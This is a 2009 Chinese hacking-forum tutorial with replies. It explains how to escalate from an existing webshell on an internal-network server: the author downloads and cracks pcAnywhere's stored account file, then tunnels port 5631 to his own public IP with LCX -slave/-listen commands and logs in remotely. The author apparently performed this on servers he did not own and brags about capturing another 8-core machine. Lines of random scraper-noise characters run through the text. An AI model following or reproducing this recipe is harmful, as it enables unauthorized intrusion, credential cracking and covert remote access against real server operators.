标题:
[原创文章]
pcanywhere之内网提权
[打印本页]
作者:
huar
时间:
2009-7-5 21:35
标题:
pcanywhere之内网提权
很多教程都是在外网直接连接的,像我这样的小菜没有这么好的命,我在用pcanywhere提权时问题总是多多,所以我今天做个在内网连接pcanywhere的简单教程。
, _& z8 {% s; K$ h' G+ ?1 k
' K. {# H+ e7 T; o$ `- R+ d
提权方法:pcanywhere+LCX
7 E( h4 L5 E6 n. R6 R( E1 |
, c, `. r, T5 g, V# u M+ r g2 ?
获得webshell的过程就不说了,该篇教程主要给新手讲下提权的思路。
( P; o6 u% G% u* z
$ O3 B' n- L0 r; W
在shell里看了下,WScript.shell等重要的组件没有被禁用,首先在有可执行读写权限的目录,上传个cmd试下可以运行。
5 e2 ]& e) z& v) z" B0 ], E1 [1 H
- R( D: o4 g7 Q- F
[attach]1548[/attach]
f5 E2 ?7 X b. `2 j, j! c
查看服务器开的端口时,发现服务器开了80、1433、5631等端口,并且服务器在内网。
2 C# h$ r; L7 f, m
$ B. L Y2 C0 O: t& ?
[attach]1549[/attach]
0 L c4 j/ }5 |: K* I1 ^
呵呵```pcanywhere的端口为5631,既然该站点有pcanywhere,我们可以试下用pcanywheere提权。于是就查下pcanywhere的目录下账号密码文件,下载到本地计算机上破解,呵呵```账号密码出来了。
$ h9 ^7 r% k5 P9 m1 G2 E0 l) D
N- I3 g( g! s1 u4 b4 o
[attach]1550[/attach]
" q! C1 \- q) |/ }2 w2 N+ o
- v9 f4 t3 n( c; W( H
[attach]1551[/attach]
0 ~8 X' y* [3 G0 F+ R0 b7 F7 C
由于服务器在内网,那我们就要做端口转发,又要用到LCX啦``
! c( b& k3 f' Z- d
1 R0 f& @$ R6 L3 H# P0 s
[attach]1552[/attach]
9 {# H# d" a0 y' x: d; {4 M
LCX的用法再简单说下:
, q7 h/ o6 B% k" ^4 m( k' ^3 s
' ^7 ^& x$ K2 ?3 W! z
服务器上运行:lcx -slave XXX.XXX.XXX.XXX(你自己公网ip) XX(端口号) XXX.XXX.XXX.XXX(服务器ip) XXXX(服务器需要转发出去的端口)
9 Y6 L6 a6 c" s0 _" v
$ t; b0 b: R8 \0 J0 Q
本地计算机上运行:lcx -listen XX(端口号) XXX(在自己机器上指定的端口)
1 i3 q v" x* D I1 b
( N/ i8 y4 C7 U; W" M" {5 N5 |
由于我的机器也在内网,LCX 转发端口到本地必须用公网ip,所以我还需要在路由器上简单设置下。
, D0 r6 y, m4 L2 r7 v
顺便说下如果大家的机器在外网就不必再做端口映射之类的啦``
x4 j H: \/ b$ A t
0 q7 W+ t! m! x t. S. u5 e) f
[attach]1553[/attach]
6 T- W, a! h' `: C* ^7 X
/ r0 D& k' ^% v% a( w
[attach]1554[/attach]
: s2 b6 g' A6 Q2 s1 ~; `
呵呵``在连接的过程中出现个小问题,由于我用的是pcanyshell10.5的版本,在连接的时候提示版本过低,那我们就用12.0的版本试下。
5 R3 k* m6 N/ i0 k5 ?; c" K' M1 f
8 d2 Y7 v4 u; l' C. a! x6 l6 x# s2 e
[attach]1555[/attach]
3 R0 Z3 |6 o$ e- `
+ e r; K6 ?! b4 [7 x7 c, j3 B
[attach]1556[/attach]
4 i- d6 E! [% @) V$ @3 Q) U
我们本地连接试试,输入我们刚破解的账号密码
5 j% Z9 t) n$ I* P! c0 p1 ]
$ b0 Y9 G$ f4 W" h( \
[attach]1557[/attach]
; i. N' T; M# G& O* M
呵呵``连接成功,服务器不错,又一个8核^︵^
1 P: o% K6 @! |: t& r9 A7 U
; E0 u7 {$ A, p/ m/ F
[attach]1558[/attach]
3 ?* J6 Q) p5 k) [
; A" @$ x2 N% z3 w
[attach]1559[/attach]
作者:
柔肠寸断
时间:
2009-7-5 21:37
不错不错。。。你的貌似一直都是内网服务器哈
作者:
huar
时间:
2009-7-5 21:41
哎。。。。运气不佳```老碰见内网的。。。。
作者:
gassiori
时间:
2009-7-6 09:50
八核的哟
作者:
柔肠寸断
时间:
2009-12-15 15:36
顶起。。。。。。。。。
作者:
killadmin
时间:
2010-1-21 20:01
但是我反弹后连接总是不成功,试着转发5632,5631一起,还是不行.
欢迎光临 【3.A.S.T】网络安全爱好者 (http://www.3ast.com/)
Powered by Discuz! 7.2
.gif)
